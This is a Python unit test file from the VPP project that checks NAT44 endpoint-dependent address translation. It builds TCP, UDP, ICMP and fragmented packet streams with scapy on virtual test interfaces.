| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
4c112d3573edd3e6931e7a7da3b6813387209e40
| 152,561
|
py
|
Python
|
test/test_nat44_ed.py
|
akanouras/vpp
|
a55a9fc239b5e47487a9489aa5dba9d229502d7e
|
[
"Apache-2.0"
] | 751
|
2017-07-13T06:16:46.000Z
|
2022-03-30T09:14:35.000Z
|
test/test_nat44_ed.py
|
akanouras/vpp
|
a55a9fc239b5e47487a9489aa5dba9d229502d7e
|
[
"Apache-2.0"
] | 15
|
2018-03-19T15:20:07.000Z
|
2022-03-18T19:48:21.000Z
|
test/test_nat44_ed.py
|
akanouras/vpp
|
a55a9fc239b5e47487a9489aa5dba9d229502d7e
|
[
"Apache-2.0"
] | 479
|
2017-07-13T06:17:26.000Z
|
2022-03-31T18:20:43.000Z
|
#!/usr/bin/env python3
import unittest
from io import BytesIO
from random import randint, shuffle, choice
import scapy.compat
from framework import VppTestCase, VppTestRunner
from scapy.data import IP_PROTOS
from scapy.layers.inet import IP, TCP, UDP, ICMP, GRE
from scapy.layers.inet import IPerror, TCPerror
from scapy.layers.l2 import Ether
from scapy.packet import Raw
from syslog_rfc5424_parser import SyslogMessage, ParseError
from syslog_rfc5424_parser.constants import SyslogSeverity
from util import ppp, ip4_range
from vpp_acl import AclRule, VppAcl, VppAclInterface
from vpp_ip_route import VppIpRoute, VppRoutePath
from vpp_papi import VppEnum
class TestNAT44ED(VppTestCase):
""" NAT44ED Test Case """
nat_addr = '10.0.0.3'
tcp_port_in = 6303
tcp_port_out = 6303
udp_port_in = 6304
udp_port_out = 6304
icmp_id_in = 6305
icmp_id_out = 6305
tcp_external_port = 80
max_sessions = 100
def setUp(self):
super().setUp()
self.plugin_enable()
def tearDown(self):
super().tearDown()
if not self.vpp_dead:
self.plugin_disable()
def plugin_enable(self):
self.vapi.nat44_ed_plugin_enable_disable(
sessions=self.max_sessions, enable=1)
def plugin_disable(self):
self.vapi.nat44_ed_plugin_enable_disable(enable=0)
@property
def config_flags(self):
return VppEnum.vl_api_nat_config_flags_t
@property
def nat44_config_flags(self):
return VppEnum.vl_api_nat44_config_flags_t
@property
def syslog_severity(self):
return VppEnum.vl_api_syslog_severity_t
@property
def server_addr(self):
return self.pg1.remote_hosts[0].ip4
@staticmethod
def random_port():
return randint(1025, 65535)
@staticmethod
def proto2layer(proto):
if proto == IP_PROTOS.tcp:
return TCP
elif proto == IP_PROTOS.udp:
return UDP
elif proto == IP_PROTOS.icmp:
return ICMP
else:
raise Exception("Unsupported protocol")
@classmethod
def create_and_add_ip4_table(cls, i, table_id=0):
cls.vapi.ip_table_add_del(is_add=1, table={'table_id': table_id})
i.set_table_ip4(table_id)
@classmethod
def configure_ip4_interface(cls, i, hosts=0, table_id=None):
if table_id:
cls.create_and_add_ip4_table(i, table_id)
i.admin_up()
i.config_ip4()
i.resolve_arp()
if hosts:
i.generate_remote_hosts(hosts)
i.configure_ipv4_neighbors()
@classmethod
def nat_add_interface_address(cls, i):
cls.vapi.nat44_add_del_interface_addr(
sw_if_index=i.sw_if_index, is_add=1)
def nat_add_inside_interface(self, i):
self.vapi.nat44_interface_add_del_feature(
flags=self.config_flags.NAT_IS_INSIDE,
sw_if_index=i.sw_if_index, is_add=1)
def nat_add_outside_interface(self, i):
self.vapi.nat44_interface_add_del_feature(
flags=self.config_flags.NAT_IS_OUTSIDE,
sw_if_index=i.sw_if_index, is_add=1)
def nat_add_address(self, address, twice_nat=0,
vrf_id=0xFFFFFFFF, is_add=1):
flags = self.config_flags.NAT_IS_TWICE_NAT if twice_nat else 0
self.vapi.nat44_add_del_address_range(first_ip_address=address,
last_ip_address=address,
vrf_id=vrf_id,
is_add=is_add,
flags=flags)
def nat_add_static_mapping(self, local_ip, external_ip='0.0.0.0',
local_port=0, external_port=0, vrf_id=0,
is_add=1, external_sw_if_index=0xFFFFFFFF,
proto=0, tag="", flags=0):
if not (local_port and external_port):
flags |= self.config_flags.NAT_IS_ADDR_ONLY
self.vapi.nat44_add_del_static_mapping(
is_add=is_add,
local_ip_address=local_ip,
external_ip_address=external_ip,
external_sw_if_index=external_sw_if_index,
local_port=local_port,
external_port=external_port,
vrf_id=vrf_id, protocol=proto,
flags=flags,
tag=tag)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.create_pg_interfaces(range(12))
cls.interfaces = list(cls.pg_interfaces[:4])
cls.create_and_add_ip4_table(cls.pg2, 10)
for i in cls.interfaces:
cls.configure_ip4_interface(i, hosts=3)
# test specific (test-multiple-vrf)
cls.vapi.ip_table_add_del(is_add=1, table={'table_id': 1})
# test specific (test-one-armed-nat44-static)
cls.pg4.generate_remote_hosts(2)
cls.pg4.config_ip4()
cls.vapi.sw_interface_add_del_address(
sw_if_index=cls.pg4.sw_if_index,
prefix="10.0.0.1/24")
cls.pg4.admin_up()
cls.pg4.resolve_arp()
cls.pg4._remote_hosts[1]._ip4 = cls.pg4._remote_hosts[0]._ip4
cls.pg4.resolve_arp()
# test specific interface (pg5)
cls.pg5._local_ip4 = "10.1.1.1"
cls.pg5._remote_hosts[0]._ip4 = "10.1.1.2"
cls.pg5.set_table_ip4(1)
cls.pg5.config_ip4()
cls.pg5.admin_up()
cls.pg5.resolve_arp()
# test specific interface (pg6)
cls.pg6._local_ip4 = "10.1.2.1"
cls.pg6._remote_hosts[0]._ip4 = "10.1.2.2"
cls.pg6.set_table_ip4(1)
cls.pg6.config_ip4()
cls.pg6.admin_up()
cls.pg6.resolve_arp()
rl = list()
rl.append(VppIpRoute(cls, "0.0.0.0", 0,
[VppRoutePath("0.0.0.0", 0xffffffff,
nh_table_id=0)],
register=False, table_id=1))
rl.append(VppIpRoute(cls, "0.0.0.0", 0,
[VppRoutePath(cls.pg1.local_ip4,
cls.pg1.sw_if_index)],
register=False))
rl.append(VppIpRoute(cls, cls.pg5.remote_ip4, 32,
[VppRoutePath("0.0.0.0",
cls.pg5.sw_if_index)],
register=False, table_id=1))
rl.append(VppIpRoute(cls, cls.pg6.remote_ip4, 32,
[VppRoutePath("0.0.0.0",
cls.pg6.sw_if_index)],
register=False, table_id=1))
rl.append(VppIpRoute(cls, cls.pg6.remote_ip4, 16,
[VppRoutePath("0.0.0.0", 0xffffffff,
nh_table_id=1)],
register=False, table_id=0))
for r in rl:
r.add_vpp_config()
def get_err_counter(self, path):
return self.statistics.get_err_counter(path)
def reass_hairpinning(self, server_addr, server_in_port, server_out_port,
host_in_port, proto=IP_PROTOS.tcp,
ignore_port=False):
layer = self.proto2layer(proto)
if proto == IP_PROTOS.tcp:
data = b"A" * 4 + b"B" * 16 + b"C" * 3
else:
data = b"A" * 16 + b"B" * 16 + b"C" * 3
# send packet from host to server
pkts = self.create_stream_frag(self.pg0,
self.nat_addr,
host_in_port,
server_out_port,
data,
proto)
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
frags = self.pg0.get_capture(len(pkts))
p = self.reass_frags_and_verify(frags,
self.nat_addr,
server_addr)
if proto != IP_PROTOS.icmp:
if not ignore_port:
self.assertNotEqual(p[layer].sport, host_in_port)
self.assertEqual(p[layer].dport, server_in_port)
else:
if not ignore_port:
self.assertNotEqual(p[layer].id, host_in_port)
self.assertEqual(data, p[Raw].load)
def frag_out_of_order(self, proto=IP_PROTOS.tcp, dont_translate=False,
ignore_port=False):
layer = self.proto2layer(proto)
if proto == IP_PROTOS.tcp:
data = b"A" * 4 + b"B" * 16 + b"C" * 3
else:
data = b"A" * 16 + b"B" * 16 + b"C" * 3
self.port_in = self.random_port()
for i in range(2):
# in2out
pkts = self.create_stream_frag(self.pg0, self.pg1.remote_ip4,
self.port_in, 20, data, proto)
pkts.reverse()
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
frags = self.pg1.get_capture(len(pkts))
if not dont_translate:
p = self.reass_frags_and_verify(frags,
self.nat_addr,
self.pg1.remote_ip4)
else:
p = self.reass_frags_and_verify(frags,
self.pg0.remote_ip4,
self.pg1.remote_ip4)
if proto != IP_PROTOS.icmp:
if not dont_translate:
self.assertEqual(p[layer].dport, 20)
if not ignore_port:
self.assertNotEqual(p[layer].sport, self.port_in)
else:
self.assertEqual(p[layer].sport, self.port_in)
else:
if not ignore_port:
if not dont_translate:
self.assertNotEqual(p[layer].id, self.port_in)
else:
self.assertEqual(p[layer].id, self.port_in)
self.assertEqual(data, p[Raw].load)
# out2in
if not dont_translate:
dst_addr = self.nat_addr
else:
dst_addr = self.pg0.remote_ip4
if proto != IP_PROTOS.icmp:
sport = 20
dport = p[layer].sport
else:
sport = p[layer].id
dport = 0
pkts = self.create_stream_frag(self.pg1, dst_addr, sport, dport,
data, proto, echo_reply=True)
pkts.reverse()
self.pg1.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.logger.info(self.vapi.cli("show trace"))
self.pg_start()
frags = self.pg0.get_capture(len(pkts))
p = self.reass_frags_and_verify(frags,
self.pg1.remote_ip4,
self.pg0.remote_ip4)
if proto != IP_PROTOS.icmp:
self.assertEqual(p[layer].sport, 20)
self.assertEqual(p[layer].dport, self.port_in)
else:
self.assertEqual(p[layer].id, self.port_in)
self.assertEqual(data, p[Raw].load)
def reass_frags_and_verify(self, frags, src, dst):
buffer = BytesIO()
for p in frags:
self.assertEqual(p[IP].src, src)
self.assertEqual(p[IP].dst, dst)
self.assert_ip_checksum_valid(p)
buffer.seek(p[IP].frag * 8)
buffer.write(bytes(p[IP].payload))
ip = IP(src=frags[0][IP].src, dst=frags[0][IP].dst,
proto=frags[0][IP].proto)
if ip.proto == IP_PROTOS.tcp:
p = (ip / TCP(buffer.getvalue()))
self.logger.debug(ppp("Reassembled:", p))
self.assert_tcp_checksum_valid(p)
elif ip.proto == IP_PROTOS.udp:
p = (ip / UDP(buffer.getvalue()[:8]) /
Raw(buffer.getvalue()[8:]))
elif ip.proto == IP_PROTOS.icmp:
p = (ip / ICMP(buffer.getvalue()))
return p
def frag_in_order(self, proto=IP_PROTOS.tcp, dont_translate=False,
ignore_port=False):
layer = self.proto2layer(proto)
if proto == IP_PROTOS.tcp:
data = b"A" * 4 + b"B" * 16 + b"C" * 3
else:
data = b"A" * 16 + b"B" * 16 + b"C" * 3
self.port_in = self.random_port()
# in2out
pkts = self.create_stream_frag(self.pg0, self.pg1.remote_ip4,
self.port_in, 20, data, proto)
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
frags = self.pg1.get_capture(len(pkts))
if not dont_translate:
p = self.reass_frags_and_verify(frags,
self.nat_addr,
self.pg1.remote_ip4)
else:
p = self.reass_frags_and_verify(frags,
self.pg0.remote_ip4,
self.pg1.remote_ip4)
if proto != IP_PROTOS.icmp:
if not dont_translate:
self.assertEqual(p[layer].dport, 20)
if not ignore_port:
self.assertNotEqual(p[layer].sport, self.port_in)
else:
self.assertEqual(p[layer].sport, self.port_in)
else:
if not ignore_port:
if not dont_translate:
self.assertNotEqual(p[layer].id, self.port_in)
else:
self.assertEqual(p[layer].id, self.port_in)
self.assertEqual(data, p[Raw].load)
# out2in
if not dont_translate:
dst_addr = self.nat_addr
else:
dst_addr = self.pg0.remote_ip4
if proto != IP_PROTOS.icmp:
sport = 20
dport = p[layer].sport
else:
sport = p[layer].id
dport = 0
pkts = self.create_stream_frag(self.pg1, dst_addr, sport, dport, data,
proto, echo_reply=True)
self.pg1.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
frags = self.pg0.get_capture(len(pkts))
p = self.reass_frags_and_verify(frags,
self.pg1.remote_ip4,
self.pg0.remote_ip4)
if proto != IP_PROTOS.icmp:
self.assertEqual(p[layer].sport, 20)
self.assertEqual(p[layer].dport, self.port_in)
else:
self.assertEqual(p[layer].id, self.port_in)
self.assertEqual(data, p[Raw].load)
def verify_capture_out(self, capture, nat_ip=None, same_port=False,
dst_ip=None, ignore_port=False):
if nat_ip is None:
nat_ip = self.nat_addr
for packet in capture:
try:
self.assert_packet_checksums_valid(packet)
self.assertEqual(packet[IP].src, nat_ip)
if dst_ip is not None:
self.assertEqual(packet[IP].dst, dst_ip)
if packet.haslayer(TCP):
if not ignore_port:
if same_port:
self.assertEqual(
packet[TCP].sport, self.tcp_port_in)
else:
self.assertNotEqual(
packet[TCP].sport, self.tcp_port_in)
self.tcp_port_out = packet[TCP].sport
self.assert_packet_checksums_valid(packet)
elif packet.haslayer(UDP):
if not ignore_port:
if same_port:
self.assertEqual(
packet[UDP].sport, self.udp_port_in)
else:
self.assertNotEqual(
packet[UDP].sport, self.udp_port_in)
self.udp_port_out = packet[UDP].sport
else:
if not ignore_port:
if same_port:
self.assertEqual(
packet[ICMP].id, self.icmp_id_in)
else:
self.assertNotEqual(
packet[ICMP].id, self.icmp_id_in)
self.icmp_id_out = packet[ICMP].id
self.assert_packet_checksums_valid(packet)
except:
self.logger.error(ppp("Unexpected or invalid packet "
"(outside network):", packet))
raise
def verify_capture_in(self, capture, in_if):
for packet in capture:
try:
self.assert_packet_checksums_valid(packet)
self.assertEqual(packet[IP].dst, in_if.remote_ip4)
if packet.haslayer(TCP):
self.assertEqual(packet[TCP].dport, self.tcp_port_in)
elif packet.haslayer(UDP):
self.assertEqual(packet[UDP].dport, self.udp_port_in)
else:
self.assertEqual(packet[ICMP].id, self.icmp_id_in)
except:
self.logger.error(ppp("Unexpected or invalid packet "
"(inside network):", packet))
raise
def create_stream_in(self, in_if, out_if, dst_ip=None, ttl=64):
if dst_ip is None:
dst_ip = out_if.remote_ip4
pkts = []
# TCP
p = (Ether(dst=in_if.local_mac, src=in_if.remote_mac) /
IP(src=in_if.remote_ip4, dst=dst_ip, ttl=ttl) /
TCP(sport=self.tcp_port_in, dport=20))
pkts.extend([p, p])
# UDP
p = (Ether(dst=in_if.local_mac, src=in_if.remote_mac) /
IP(src=in_if.remote_ip4, dst=dst_ip, ttl=ttl) /
UDP(sport=self.udp_port_in, dport=20))
pkts.append(p)
# ICMP
p = (Ether(dst=in_if.local_mac, src=in_if.remote_mac) /
IP(src=in_if.remote_ip4, dst=dst_ip, ttl=ttl) /
ICMP(id=self.icmp_id_in, type='echo-request'))
pkts.append(p)
return pkts
def create_stream_out(self, out_if, dst_ip=None, ttl=64,
use_inside_ports=False):
if dst_ip is None:
dst_ip = self.nat_addr
if not use_inside_ports:
tcp_port = self.tcp_port_out
udp_port = self.udp_port_out
icmp_id = self.icmp_id_out
else:
tcp_port = self.tcp_port_in
udp_port = self.udp_port_in
icmp_id = self.icmp_id_in
pkts = []
# TCP
p = (Ether(dst=out_if.local_mac, src=out_if.remote_mac) /
IP(src=out_if.remote_ip4, dst=dst_ip, ttl=ttl) /
TCP(dport=tcp_port, sport=20))
pkts.extend([p, p])
# UDP
p = (Ether(dst=out_if.local_mac, src=out_if.remote_mac) /
IP(src=out_if.remote_ip4, dst=dst_ip, ttl=ttl) /
UDP(dport=udp_port, sport=20))
pkts.append(p)
# ICMP
p = (Ether(dst=out_if.local_mac, src=out_if.remote_mac) /
IP(src=out_if.remote_ip4, dst=dst_ip, ttl=ttl) /
ICMP(id=icmp_id, type='echo-reply'))
pkts.append(p)
return pkts
def create_tcp_stream(self, in_if, out_if, count):
pkts = []
port = 6303
for i in range(count):
p = (Ether(dst=in_if.local_mac, src=in_if.remote_mac) /
IP(src=in_if.remote_ip4, dst=out_if.remote_ip4, ttl=64) /
TCP(sport=port + i, dport=20))
pkts.append(p)
return pkts
def create_stream_frag(self, src_if, dst, sport, dport, data,
proto=IP_PROTOS.tcp, echo_reply=False):
if proto == IP_PROTOS.tcp:
p = (IP(src=src_if.remote_ip4, dst=dst) /
TCP(sport=sport, dport=dport) /
Raw(data))
p = p.__class__(scapy.compat.raw(p))
chksum = p[TCP].chksum
proto_header = TCP(sport=sport, dport=dport, chksum=chksum)
elif proto == IP_PROTOS.udp:
proto_header = UDP(sport=sport, dport=dport)
elif proto == IP_PROTOS.icmp:
if not echo_reply:
proto_header = ICMP(id=sport, type='echo-request')
else:
proto_header = ICMP(id=sport, type='echo-reply')
else:
raise Exception("Unsupported protocol")
id = self.random_port()
pkts = []
if proto == IP_PROTOS.tcp:
raw = Raw(data[0:4])
else:
raw = Raw(data[0:16])
p = (Ether(src=src_if.remote_mac, dst=src_if.local_mac) /
IP(src=src_if.remote_ip4, dst=dst, flags="MF", frag=0, id=id) /
proto_header /
raw)
pkts.append(p)
if proto == IP_PROTOS.tcp:
raw = Raw(data[4:20])
else:
raw = Raw(data[16:32])
p = (Ether(src=src_if.remote_mac, dst=src_if.local_mac) /
IP(src=src_if.remote_ip4, dst=dst, flags="MF", frag=3, id=id,
proto=proto) /
raw)
pkts.append(p)
if proto == IP_PROTOS.tcp:
raw = Raw(data[20:])
else:
raw = Raw(data[32:])
p = (Ether(src=src_if.remote_mac, dst=src_if.local_mac) /
IP(src=src_if.remote_ip4, dst=dst, frag=5, proto=proto,
id=id) /
raw)
pkts.append(p)
return pkts
def frag_in_order_in_plus_out(self, in_addr, out_addr, in_port, out_port,
proto=IP_PROTOS.tcp):
layer = self.proto2layer(proto)
if proto == IP_PROTOS.tcp:
data = b"A" * 4 + b"B" * 16 + b"C" * 3
else:
data = b"A" * 16 + b"B" * 16 + b"C" * 3
port_in = self.random_port()
for i in range(2):
# out2in
pkts = self.create_stream_frag(self.pg0, out_addr,
port_in, out_port,
data, proto)
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
frags = self.pg1.get_capture(len(pkts))
p = self.reass_frags_and_verify(frags,
self.pg0.remote_ip4,
in_addr)
if proto != IP_PROTOS.icmp:
self.assertEqual(p[layer].sport, port_in)
self.assertEqual(p[layer].dport, in_port)
else:
self.assertEqual(p[layer].id, port_in)
self.assertEqual(data, p[Raw].load)
# in2out
if proto != IP_PROTOS.icmp:
pkts = self.create_stream_frag(self.pg1, self.pg0.remote_ip4,
in_port,
p[layer].sport, data, proto)
else:
pkts = self.create_stream_frag(self.pg1, self.pg0.remote_ip4,
p[layer].id, 0, data, proto,
echo_reply=True)
self.pg1.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
frags = self.pg0.get_capture(len(pkts))
p = self.reass_frags_and_verify(frags,
out_addr,
self.pg0.remote_ip4)
if proto != IP_PROTOS.icmp:
self.assertEqual(p[layer].sport, out_port)
self.assertEqual(p[layer].dport, port_in)
else:
self.assertEqual(p[layer].id, port_in)
self.assertEqual(data, p[Raw].load)
def frag_out_of_order_in_plus_out(self, in_addr, out_addr, in_port,
out_port, proto=IP_PROTOS.tcp):
layer = self.proto2layer(proto)
if proto == IP_PROTOS.tcp:
data = b"A" * 4 + b"B" * 16 + b"C" * 3
else:
data = b"A" * 16 + b"B" * 16 + b"C" * 3
port_in = self.random_port()
for i in range(2):
# out2in
pkts = self.create_stream_frag(self.pg0, out_addr,
port_in, out_port,
data, proto)
pkts.reverse()
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
frags = self.pg1.get_capture(len(pkts))
p = self.reass_frags_and_verify(frags,
self.pg0.remote_ip4,
in_addr)
if proto != IP_PROTOS.icmp:
self.assertEqual(p[layer].dport, in_port)
self.assertEqual(p[layer].sport, port_in)
self.assertEqual(p[layer].dport, in_port)
else:
self.assertEqual(p[layer].id, port_in)
self.assertEqual(data, p[Raw].load)
# in2out
if proto != IP_PROTOS.icmp:
pkts = self.create_stream_frag(self.pg1, self.pg0.remote_ip4,
in_port,
p[layer].sport, data, proto)
else:
pkts = self.create_stream_frag(self.pg1, self.pg0.remote_ip4,
p[layer].id, 0, data, proto,
echo_reply=True)
pkts.reverse()
self.pg1.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
frags = self.pg0.get_capture(len(pkts))
p = self.reass_frags_and_verify(frags,
out_addr,
self.pg0.remote_ip4)
if proto != IP_PROTOS.icmp:
self.assertEqual(p[layer].sport, out_port)
self.assertEqual(p[layer].dport, port_in)
else:
self.assertEqual(p[layer].id, port_in)
self.assertEqual(data, p[Raw].load)
def init_tcp_session(self, in_if, out_if, in_port, ext_port):
# SYN packet in->out
p = (Ether(src=in_if.remote_mac, dst=in_if.local_mac) /
IP(src=in_if.remote_ip4, dst=out_if.remote_ip4) /
TCP(sport=in_port, dport=ext_port, flags="S"))
in_if.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = out_if.get_capture(1)
p = capture[0]
out_port = p[TCP].sport
# SYN + ACK packet out->in
p = (Ether(src=out_if.remote_mac, dst=out_if.local_mac) /
IP(src=out_if.remote_ip4, dst=self.nat_addr) /
TCP(sport=ext_port, dport=out_port, flags="SA"))
out_if.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
in_if.get_capture(1)
# ACK packet in->out
p = (Ether(src=in_if.remote_mac, dst=in_if.local_mac) /
IP(src=in_if.remote_ip4, dst=out_if.remote_ip4) /
TCP(sport=in_port, dport=ext_port, flags="A"))
in_if.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
out_if.get_capture(1)
return out_port
def twice_nat_common(self, self_twice_nat=False, same_pg=False, lb=False,
client_id=None):
twice_nat_addr = '10.0.1.3'
port_in = 8080
if lb:
if not same_pg:
port_in1 = port_in
port_in2 = port_in
else:
port_in1 = port_in + 1
port_in2 = port_in + 2
port_out = 80
eh_port_out = 4567
server1 = self.pg0.remote_hosts[0]
server2 = self.pg0.remote_hosts[1]
if lb and same_pg:
server2 = server1
if not lb:
server = server1
pg0 = self.pg0
if same_pg:
pg1 = self.pg0
else:
pg1 = self.pg1
eh_translate = ((not self_twice_nat) or (not lb and same_pg) or
client_id == 1)
self.nat_add_address(self.nat_addr)
self.nat_add_address(twice_nat_addr, twice_nat=1)
flags = 0
if self_twice_nat:
flags |= self.config_flags.NAT_IS_SELF_TWICE_NAT
else:
flags |= self.config_flags.NAT_IS_TWICE_NAT
if not lb:
self.nat_add_static_mapping(pg0.remote_ip4, self.nat_addr,
port_in, port_out,
proto=IP_PROTOS.tcp,
flags=flags)
else:
locals = [{'addr': server1.ip4,
'port': port_in1,
'probability': 50,
'vrf_id': 0},
{'addr': server2.ip4,
'port': port_in2,
'probability': 50,
'vrf_id': 0}]
out_addr = self.nat_addr
self.vapi.nat44_add_del_lb_static_mapping(is_add=1, flags=flags,
external_addr=out_addr,
external_port=port_out,
protocol=IP_PROTOS.tcp,
local_num=len(locals),
locals=locals)
self.nat_add_inside_interface(pg0)
self.nat_add_outside_interface(pg1)
if same_pg:
if not lb:
client = server
else:
assert client_id is not None
if client_id == 1:
client = self.pg0.remote_hosts[0]
elif client_id == 2:
client = self.pg0.remote_hosts[1]
else:
client = pg1.remote_hosts[0]
p = (Ether(src=pg1.remote_mac, dst=pg1.local_mac) /
IP(src=client.ip4, dst=self.nat_addr) /
TCP(sport=eh_port_out, dport=port_out))
pg1.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = pg0.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
if lb:
if ip.dst == server1.ip4:
server = server1
port_in = port_in1
else:
server = server2
port_in = port_in2
self.assertEqual(ip.dst, server.ip4)
if lb and same_pg:
self.assertIn(tcp.dport, [port_in1, port_in2])
else:
self.assertEqual(tcp.dport, port_in)
if eh_translate:
self.assertEqual(ip.src, twice_nat_addr)
self.assertNotEqual(tcp.sport, eh_port_out)
else:
self.assertEqual(ip.src, client.ip4)
self.assertEqual(tcp.sport, eh_port_out)
eh_addr_in = ip.src
eh_port_in = tcp.sport
saved_port_in = tcp.dport
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
p = (Ether(src=server.mac, dst=pg0.local_mac) /
IP(src=server.ip4, dst=eh_addr_in) /
TCP(sport=saved_port_in, dport=eh_port_in))
pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = pg1.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.dst, client.ip4)
self.assertEqual(ip.src, self.nat_addr)
self.assertEqual(tcp.dport, eh_port_out)
self.assertEqual(tcp.sport, port_out)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
if eh_translate:
sessions = self.vapi.nat44_user_session_dump(server.ip4, 0)
self.assertEqual(len(sessions), 1)
self.assertTrue(sessions[0].flags &
self.config_flags.NAT_IS_EXT_HOST_VALID)
self.assertTrue(sessions[0].flags &
self.config_flags.NAT_IS_TWICE_NAT)
self.logger.info(self.vapi.cli("show nat44 sessions"))
self.vapi.nat44_del_session(
address=sessions[0].inside_ip_address,
port=sessions[0].inside_port,
protocol=sessions[0].protocol,
flags=(self.config_flags.NAT_IS_INSIDE |
self.config_flags.NAT_IS_EXT_HOST_VALID),
ext_host_address=sessions[0].ext_host_nat_address,
ext_host_port=sessions[0].ext_host_nat_port)
sessions = self.vapi.nat44_user_session_dump(server.ip4, 0)
self.assertEqual(len(sessions), 0)
def verify_syslog_sess(self, data, is_add=True, is_ip6=False):
message = data.decode('utf-8')
try:
message = SyslogMessage.parse(message)
except ParseError as e:
self.logger.error(e)
raise
else:
self.assertEqual(message.severity, SyslogSeverity.info)
self.assertEqual(message.appname, 'NAT')
self.assertEqual(message.msgid, 'SADD' if is_add else 'SDEL')
sd_params = message.sd.get('nsess')
self.assertTrue(sd_params is not None)
if is_ip6:
self.assertEqual(sd_params.get('IATYP'), 'IPv6')
self.assertEqual(sd_params.get('ISADDR'), self.pg0.remote_ip6)
else:
self.assertEqual(sd_params.get('IATYP'), 'IPv4')
self.assertEqual(sd_params.get('ISADDR'), self.pg0.remote_ip4)
self.assertTrue(sd_params.get('SSUBIX') is not None)
self.assertEqual(sd_params.get('ISPORT'), "%d" % self.tcp_port_in)
self.assertEqual(sd_params.get('XATYP'), 'IPv4')
self.assertEqual(sd_params.get('XSADDR'), self.nat_addr)
self.assertEqual(sd_params.get('XSPORT'), "%d" % self.tcp_port_out)
self.assertEqual(sd_params.get('PROTO'), "%d" % IP_PROTOS.tcp)
self.assertEqual(sd_params.get('SVLAN'), '0')
self.assertEqual(sd_params.get('XDADDR'), self.pg1.remote_ip4)
self.assertEqual(sd_params.get('XDPORT'),
"%d" % self.tcp_external_port)
def test_icmp_error(self):
""" NAT44ED test ICMP error message with inner header"""
payload = "H" * 10
self.nat_add_address(self.nat_addr)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
# in2out (initiate connection)
p1 = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
UDP(sport=21, dport=20) / payload)
self.pg0.add_stream(p1)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg1.get_capture(1)[0]
# out2in (send error message)
p2 = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
ICMP(type='dest-unreach', code='port-unreachable') /
capture[IP:])
self.pg1.add_stream(p2)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(1)[0]
self.logger.info(ppp("p1 packet:", p1))
self.logger.info(ppp("p2 packet:", p2))
self.logger.info(ppp("capture packet:", capture))
def test_icmp_echo_reply_trailer(self):
""" ICMP echo reply with ethernet trailer"""
self.nat_add_address(self.nat_addr)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
# in2out
p1 = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
ICMP(type=8, id=0xabcd, seq=0))
self.pg0.add_stream(p1)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
c = self.pg1.get_capture(1)[0]
self.logger.debug(self.vapi.cli("show trace"))
# out2in
p2 = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4, dst=self.nat_addr, id=0xee59) /
ICMP(type=0, id=c[ICMP].id, seq=0))
# force checksum calculation
p2 = p2.__class__(bytes(p2))
self.logger.debug(ppp("Packet before modification:", p2))
# hex representation of vss monitoring ethernet trailer
# this seems to be just added to end of packet without modifying
# IP or ICMP lengths / checksums
p2 = p2 / Raw("\x00\x00\x52\x54\x00\x46\xab\x04\x84\x18")
# change it so that IP/ICMP is unaffected
p2[IP].len = 28
self.logger.debug(ppp("Packet with added trailer:", p2))
self.pg1.add_stream(p2)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg0.get_capture(1)
def test_users_dump(self):
""" NAT44ED API test - nat44_user_dump """
self.nat_add_address(self.nat_addr)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
self.vapi.nat44_forwarding_enable_disable(enable=1)
local_ip = self.pg0.remote_ip4
external_ip = self.nat_addr
self.nat_add_static_mapping(local_ip, external_ip)
users = self.vapi.nat44_user_dump()
self.assertEqual(len(users), 0)
# in2out - static mapping match
pkts = self.create_stream_out(self.pg1)
self.pg1.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(len(pkts))
self.verify_capture_in(capture, self.pg0)
pkts = self.create_stream_in(self.pg0, self.pg1)
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
